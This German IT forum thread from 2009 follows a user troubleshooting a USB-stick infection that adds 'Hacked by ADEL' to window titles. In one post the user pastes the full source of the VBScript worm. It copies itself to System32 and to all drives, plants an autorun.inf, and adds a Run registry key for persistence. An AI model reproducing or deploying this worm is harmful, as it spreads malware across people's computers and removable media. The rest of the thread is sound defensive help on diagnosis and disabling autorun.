Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

im Fenstertext des Explorers erscheint die Anzeige HACKED BY ADEL

Frage Sicherheit Viren und Trojaner

Mitglied: Auweh

Auweh (Level 1) - Jetzt verbinden

03.01.2009, aktualisiert 22:04 Uhr, 6020 Aufrufe, 20 Kommentare

Habe mit Antivir einen Stick desinfiziert und seitdem im Fenster- und Explorertext (Vorschau) hinter jedem Dateinamen den Zusatz - HACKED BY ADEL. Die Dateien befinden sich eigentlich in Quaratäne. Kann die Infektion schon beim Installieren des Sticks stattgefunden haben?

hallo, Forum,

ich glaube ich habe mir gerade was eingefangen. Ein Freund hat mir auf seinem Stick Dateien mitgebracht. Beim Öffnen mit dem Explorer hat mein Anti-Vir gebimmelt. Zugriff verweigert - Scan gemacht - Signatur angeguckt - Klassifizierung von AVIRA eher harmlos. Trotzdem: Stick formatiert - betreffende Scripte gelöscht.
Nun stelle ich plötzlich fest, dass hinter jedem Datei-Namen, den mir der Explorer anzeigt der Zusatz HACKED BY ADEL steht. Adel ist auch der Name meines Freundes, der aber definitiv nicht der Schöpfer dieses Scripts sein kann. Was ist das?

Erkannt von Antivir(Premium): Dateien: ADEL.vbs und KUNDEN8.vbs - Beschreibung beider Dateien: Contains recognition pattern of the HTML/Silly.Gen HTML script virus

Erstaunlich dabei ist, dass als Quelle zuerst der Stick lokalisiert wurde, beim zweiten Scan die Datei ADEL.vbs aber plötzlich auf meinem lokalen Backaup-Laufwerk war, wohin ich definitiv nichts kopiert habe.

Weiß jemand mehr über dieses ominöse Script?

Please tell me -

Grüße aus Bamberg

Uwe
Mitglied: Raik01
03.01.2009 um 19:56 Uhr
Leider nicht! das .vbs steht für Visual Basic Scribt und die Namen davor sind einfache Dateinamen. Ich habe auch noch keinen Virus mit dem Namen Kunden o. Adel gehört.
Bitte warten ..
Mitglied: DerWoWusste
03.01.2009 um 19:58 Uhr
Die Daten wurden geadelt - ist doch süß.
Das Skript könntest Du eventuell aus der Quarantäne von Antivir fischen (je nach Einstellung) oder mit viel Glück noch mit einer undelete Software aus dem Stick kratzen.
Aber: Warum soll es nicht Dein Kumpel gewesen sein? Glaubst Du ernsthaft, dass ein Virus so schlau ist, seinen Familiennamen festzustellen und in das Script einzubauen? Denkbar ist alles.
Da auf Sticks auch eine Autorun-Funktion greifen kann, ist das alles möglich. Und da Du natürlich alks Admin arbeitest, kann der auch munter alles in Deinem Namen umbenennen.
Bitte warten ..
Mitglied: Auweh
03.01.2009 um 20:16 Uhr
besagter ADEL war das nicht, der kanns noch weniger wie ich - ich kann sowas nämlich auch nicht.

Doch das Problem verschärft sich gerade:

Wenn ich über Arbeitsplatz ein Laufwerk zu öffnen versuche, bekomme ich von Windows die Fehlermeldung, die ADEL.vbs könne nicht gefunden werden und nichts geht. Mit dem Explorer gehts. Habe eine Autorun.inf ausfindig gemacht mit Text:

[autorun]
shellexecute=wscript.exe ADEL.vbs

Das löschen dieser Datei bringt aber nichts - Sie ist jetzt aber auf allen Laufwerken zu finden - Langsam werde ich nervös!

Uwe
Bitte warten ..
Mitglied: DerWoWusste
03.01.2009 um 20:32 Uhr
Kein Problem, nimm Dein Image und Deine Datensicherungen und zeig dem Adel den Stinkefinger.
(Ich hab solche Kommentare wie meins hier schon 1000x gelesen - albern, jetzt selbst so zu antworten).
Uwe, wenn Du nichts davon verstehst, was da abläuft, dann schalt den PC ab und frag jemanden, der das kann. Wir können das hier auch nicht so toll, ohne am PC zu sitzen.

Was Du versuchen kannst, ist ein Virenscan offline. Platte an einen anderen Rechner !!!mit abgeschalteter Autostartfunktion!!! anschließen und bereinigen und weitersehen. Daten sichern.
Bitte warten ..
Mitglied: VW
04.01.2009 um 00:56 Uhr
Moin,

hast du besagte ADEL.vbs noch irgendwo in Quarantäne? Wenn ja mache doch bitte mal einen Rechtsklick auf diese ADEL.vbs, klicke auf "Bearbeiten" und kopiere den Text darin in einen Code-Block (siehe Formatierungshilfe) in einem Kommentar hier. Der eine oder andere wird damit sicherlich etwas anfangen können.

Ansonsten sichere mit Knoppix oder einer ähnlichen Live-Linux-CD/DVD alle deine wichtigen Dateien (wichtig: weder vbs, noch sonstige ausführbare Dateien, wie exe, com, bat, cmd usw. sichern) auf USB-Festplatte o.ä.
Danach installiere Windows und die Programme neu, oder überlasse einem Profi das "Schlachtfeld".

Mit freundlichen Grüßen,
VW
Bitte warten ..
Mitglied: 60730
04.01.2009 um 22:30 Uhr
Servus,

schau mal mit regedit in folgenden Baum:

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title

"dort" hat sich dein Freundlicher (nochwenigeralsdukönnender) Kumpel fälschlicherweise als Hacker geoutet und wenn du den Abschnitt "Window Tilte" löschst, dann ist schon mal die Fensteranzeige normal.
Und für den Rest, wäre der Inhalt der Adel.vbs sehr interessant.

Gruß
Bitte warten ..
Mitglied: VW
04.01.2009 um 22:37 Uhr
@"Adel":
Kann es sein, dass der Viren-Lieferant (dein Kumpel) sich an seinem PC mit dem Username "Adel" anmeldet?
Ich habe es schon öfters erlebt, dass Viren bei der Eigen-/ Selbst-Erstellung den Usernamen oder einen ähnlichen Parameter/Variable mit in den Virus einfließen lassen, um die eigentliche Herkunft zu verschleiern usw.

Mit freundlichen Grüßen,
VW
Bitte warten ..
Mitglied: 60730
04.01.2009 um 23:43 Uhr
Servus Vw,

das müßte dann aber schon ein sehr dämlicher oder alter Virus/Wurm sein - aktuelle Würmer/viren sind doch eher so angelegt, daß Benutzer möglichst nichts vom Vorhandensein seines selbst mitbekommt, um bloss keinen Virenscanner auf den Seuchenträger anzusetzen.

Das Labeln des IE ist daher eher unter der Rubrik "Ich war hier" oder "I was here" anzusiedeln...

Nur weil das .vbs auch so heißt....

Wenn deine Theorie stimmt - müßte der vbs Wurm auf seiner Kiste ja dann auch wie der Threadersteller heißen - und nicht wie dessen Kumpel.

Gruß
Bitte warten ..
Mitglied: VW
05.01.2009 um 17:13 Uhr
Moin,

Zitat von 60730:

das müßte dann aber schon ein sehr dämlicher oder
alter Virus/Wurm sein - aktuelle Würmer/viren sind doch eher so angelegt, dass Benutzer möglichst nichts vom Vorhandensein seines selbst mitbekommt, um bloss keinen Virenscanner auf den Seuchenträger anzusetzen.

Das Labeln des IE ist daher eher unter der Rubrik "Ich war
hier" oder "I was here" anzusiedeln...
Naja, es gibt genügend Script-Kiddies, die Spaß daran haben, diese "I was here"-Spielereien zu programmieren, um Leuten zu beweisen, dass sie es geschafft haben, sich in das Betriebssystem zu integrieren.
Nur weil das .vbs auch so heißt....

Wenn deine Theorie stimmt - müßte der vbs Wurm auf seiner Kiste ja dann auch wie der Threadersteller heißen - und nicht wie dessen Kumpel.
Jein, vielleicht hat der Virus ja den Benutzernamen des Wirts (der PC des Kumpels) bereits fest in seine selbst generierte vbs-Datei eingebunden und, wenn der Thread-Ersteller Daten auf einem USB-Stick weitergibt, landet der Username des Threaderstellers in der ADEL.vbs, wobei die Datei dann vermutlich nicht mehr ADEL.vbs, sondern z.B. UWE.vbs heißt, und einen String "Hacked by UWE" in den Explorer einbindet.
Ich gebe zu, die Theorie ist ziemlich gewagt´und unwahrscheinlich, ... aber möglich.

VW
Bitte warten ..
Mitglied: 60730
05.01.2009 um 17:19 Uhr
Servus VW,

Ich gebe zu, die Theorie ist ziemlich gewagt´und unwahrscheinlich, ... aber möglich.

yupp - nichts ist unmöglich - wie uns die M4tr1x-Trilogie oder i hacked 127.0.0.1 ja schon bewiesen haben.

So langsam hab ich auch die Tischplatte mit den Fingern durchgetrommelt, vielleicht hat Uwe ja noch das VBS und stellt es uns zur Verfügung.
@Uwe

Gruß
Bitte warten ..
Mitglied: Auweh
05.01.2009 um 21:10 Uhr
hallo, Timo, hallo VW,

ich bin wieder da. Schön, dass sich jemand meines Problems so sachlich annimmt. Im Moment nur soviel:
Meine Schwierigkeiten scheinen nach ein bisschen Trickserei nun behoben. Es ist außer einer gewissen Verwirrung meinerseits auch weiter kein Schaden entstanden. Trotzdem werde ich das Prozedere, incl. der VBS usw. noch mal zusammenstellen. Denn was da genau abgelaufen ist, habe ich noch immer nicht ganz überrissen.

Bitte habt etwas Geduld - ich mach das heute abend noch.

Multiple thanks to everybody!
Bitte warten ..
Mitglied: Auweh
05.01.2009 um 22:41 Uhr
Zitat von Auweh:
hallo, Timo, hallo VW,

ich bin wieder da. Schön, dass sich jemand meines Problems so
sachlich annimmt. Im Moment nur soviel:
Meine Schwierigkeiten scheinen nach ein bisschen Trickserei nun
behoben. Es ist außer einer gewissen Verwirrung meinerseits auch
weiter kein Schaden entstanden. Trotzdem werde ich das Prozedere,
incl. der VBS usw. noch mal zusammenstellen. Denn was da genau
abgelaufen ist, habe ich noch immer nicht ganz überrissen.

Bitte habt etwas Geduld - ich mach das heute abend noch.

Multiple thanks to everybody!


So, also, jetzt gehts weiter:

1. Ja, der ADEL ist auch als Benutzer angemeldet
2. Er scheidet als Bösewicht völlig aus - Erstens, weil mein guter Freund, und Zweitens, weil Bildhauer von Beruf und völlig EDV-Antiseptisch.
3. Hier ist der böse Virus, von dem ich gerne wüsste, ob es wirklich nur ein "Hallo, ich bin drin"- Gag ist.
Übrigens Timo: Thanks für den Tip mit dem Windows Title im IE - Das hat mich vorwärts gebracht! !

Nun, bevor die Tischplatte unter deinen blutigen Fingern birst; hier die ADEL.VBS

'Mutation of Trojan virus.
'My name is KOCH03.vbs
On error resume next
Dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd,oldname,newname,rgname
Set fs = createobject("Scripting.FileSystemObject")
Set wn = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = wn.ComputerName & ".vbs"
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe KOCH03.vbs"
dim text,size
size = mf.size
check = mf.drive.drivetype
Set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
Loop
mysource=Replace(mysource,oldname,newname)
do
Set winpath = fs.getspecialfolder(0)
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 32
Set tf=fs.createtextfile(winpath & "\SYSTEM32\" & newname,2,true)
tf.write mysource
tf.close
Set tf = fs.getfile(winpath & "\SYSTEM32\" & newname)
tf.attributes = 39
For each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\KOCH03.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\KOCH03.vbs",2,true)
tf.write mysource
tf.close
Set tf=fs.getfile(flashdrive.path &"\KOCH03.vbs")
tf.attributes =39
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
Set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
End If
next
Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname, ".vbs","")
if check <> 1 then
Wscript.sleep 120000
End if
loop while check<>1
Set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

PS: Das Ding löst schon Alarm aus, wenn ich es lese!

Chereo
Bitte warten ..
Mitglied: DerWoWusste
06.01.2009 um 00:03 Uhr
Gut
Dann ist es ja doch kein File-Infector und lediglich der Fenstertitel. Den Namen liest er aus der Registrierung aus und wenn da Koch/Adel drinsteht, dann ist das auch klar.
Sieht also eher aus, als wäre die Absicht des Dings, eine Art Nachbarschaftsstreit anzufachen
Bitte warten ..
Mitglied: VW
06.01.2009 um 23:47 Uhr
Moin,

demnach hatte ich mit meiner Theorie doch recht .... nur, dass offensichtlich der Hostname und nicht der Benutzername verwendet wird.

Gut zu wissen, dass das Skript nur ein "Ich war hier" ist.

Könntest du das Skript dann vielleicht noch in code-tags packen? (siehe Formatierungshilfe" direkt über dem Kommentar-Feld)
Danke.

VW
Bitte warten ..
Mitglied: Auweh
07.01.2009 um 01:11 Uhr
high hai, VW,

danke für die Info, im Klartext heißt das wohl, es war ein Gag harmloserer Art. - sorry habe so´n Zeug bisher noch nicht gepostet - Hoffe das war nicht gefährlich!

Trotzdem: Eines musst du mir bitte noch beibiegen:
Wie ist die Autorun.inf auf meine Laufwerke gekommen, und der Eintrag in, wo doch schon beim Anmelden des Sticks der Antivir den Zugriff verweigert hat, bevor irgendwas geöffnet wurde?

Irgendwie muss der dann ja dann doch durchgeschlüpft sein - oder nicht?

Uwe
Bitte warten ..
Mitglied: Biber
07.01.2009 um 11:19 Uhr
Moin Auweh,

Trotzdem: Eines musst du mir bitte noch beibiegen:
Wie ist die Autorun.inf auf meine Laufwerke gekommen, ....

Steht ebenfalls in diesem zusammengeschroteten Kiddieschnipsel.
... 
Set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true) 
...
sorry habe so´n Zeug bisher noch nicht gepostet - Hoffe das war nicht gefährlich!
Codefetzen ohne jegliche Kommentierung sind immer unwartbar und dementsprechend nur zum einmaligen Gebrauch geeignet. Wenn also jemand für die Erstellung dieses Skriptchens bezahlt hätte, dann wäre es rausgeworfenes Geld. Und insofern unter Investitionsgesichtspunkten gefährlich.

Konstrukte, die funktionieren ohne dass nachvollziehbar ist warum sind in der politischen Welt hinzunehmen (siehe F.D.P.), aber nicht im Bereich der IT.

Grüße
Biber
Bitte warten ..
Mitglied: Auweh
07.01.2009 um 16:51 Uhr
Tach auch, Biber,

tschludige, dass ich so begriffsstuzig bin, aber dieser Befehl ist doch Bestandteil eines Scripts, das laut Antivir nicht ausgeführt wurde!
Wenn das so einfach geht, brauche ich doch keinen Guard mehr.

Une wenns och so einfach ist:
Kann ich verhindern, dass unauthorisiert Dateien (von extern) auf meine lokalen Laufwerke kopiert werden, (denn das ist hier ja scheinbar passiert)ohne mich bei meiner eigenen Arbeit bei jedem Kopier- oder Speichervorgang jedesmal identifizieren zu müssn?

Uwe
Bitte warten ..
Mitglied: Biber
07.01.2009 um 17:44 Uhr
Moin Auweh,

aber dieser Befehl ist doch Bestandteil eines Scripts, das laut Antivir nicht ausgeführt wurde!
Das kannst Du so nicht sagen...
AntiVir hat das *.vbs geblockt, als Du es per Doppelklick im Explorer ausführen lassen wolltest.
Möglicherweise hat Antivir aber NICHTS geblockt, als Dein Kumpel den USB-Stick mit dem Autorun.inf-File eingesteckt hat.
Evtl. wurde das ausgeführt.
Ich gebe Dir Recht, dass der Stressmacher eigentlich nicht die doppelgeklickte Datei sein sollte.

Kann ich verhindern, dass unauthorisiert Dateien (von extern) auf meine lokalen Laufwerke kopiert werden,
Wie meine Lieblingspraktikantin immer zu sagen pflegte: "Ich lass mir nicht vom jedem irgendwas irgendwo reinstecken."
Und die kannte sich damals noch nicht mal mit USB-Sticks so gut aus.

Grüsse
Biber
Bitte warten ..
Mitglied: VW
07.01.2009 um 18:14 Uhr
Moin,

das Problem bei solchen "niedlichen" Skript-Viren ist, dass diese auf einfachen Windows-Funktionen basieren, die an sich nichts böses wollen. Daher wäre es sicherlich fatal, wenn AntiVir jedes Auftreten dieser Befehle blockieren würde.
Jeder, auch nur leicht Batch-erfahrene, Admin wird ohne weiteres eine Batch-Datei schreiben können, die deinem Windows-Betriebssystem mit einfachsten Batch-Befehlen ohne weitere Programme schaden kann. Ein gutes Beispiel für vbs-Viren hast du ja quasi "live" erlebt.
Meine Versuchs-Batch (irritiert eigentlich nur den User) wurde jedenfalls bisher noch von keinem AntiVirus-Programm erkannt, obwohl ein User diese "nervige" Datei sicherlich als Virus einstufen würde.

Kann ich verhindern, dass unautorisiert Dateien (von extern) auf meine lokalen Laufwerke kopiert werden,
Deaktiviere den Autostart. Wie das generell geht, weiß ich zwar so nicht auswendig, aber ich bin mir sicher, dass du dazu genügend Treffer in der internen Forum-Suche oder bei Google findest. Dann werden keine Autorun.inf-Dateien mehr ausgeführt, wodurch allerdings auch beim einlegen einer CD die Installation nicht mehr automatisch startet.

Mit freundlichen Grüßen,
VW
Bitte warten ..
Mitglied: Auweh
07.01.2009 um 18:20 Uhr
Danke Jungs,
jetzt bin ich glücklich.
Den Rest krieg ich hin. (Und mit der Scripterei werd ich mich auch mal näher befassen)

Werd euch weiterempehlen!

Gruß und Thanks a lot!

Uwe
Bitte warten ..
Neuester Wissensbeitrag
CPU, RAM, Mainboards

Angetestet: PC Engines APU 3a2 im Rack-Gehäuse

Erfahrungsbericht von ashnod zum Thema CPU, RAM, Mainboards ...

Ähnliche Inhalte
RedHat, CentOS, Fedora
Linux-Distribution: Fedora 25 erscheint mit Wayland als Standard (1)

Link von runasservice zum Thema RedHat, CentOS, Fedora ...

E-Mail
gelöst GMail: Anzeige der Mailübersicht ändern (7)

Frage von honeybee zum Thema E-Mail ...

Netzwerkmanagement
SMT by palle Server Management Monitoring Tool (6)

Link von palle1977 zum Thema Netzwerkmanagement ...

RedHat, CentOS, Fedora
gelöst Die Website hat die Anzeige dieser Webseite abgelehnt - SePolicies - Linux (1)

Frage von rainergugus zum Thema RedHat, CentOS, Fedora ...

Heiß diskutierte Inhalte
Grafikkarten & Monitore
Win 10 Grafikkarte Crash von Software? (13)

Frage von Marabunta zum Thema Grafikkarten & Monitore ...

DSL, VDSL
DSL-Signal bewerten (10)

Frage von SarekHL zum Thema DSL, VDSL ...

Windows Server
Mailserver auf Windows Server 2012 (8)

Frage von StefanT81 zum Thema Windows Server ...

Backup
Clients als Server missbrauchen? (8)

Frage von 1410640014 zum Thema Backup ...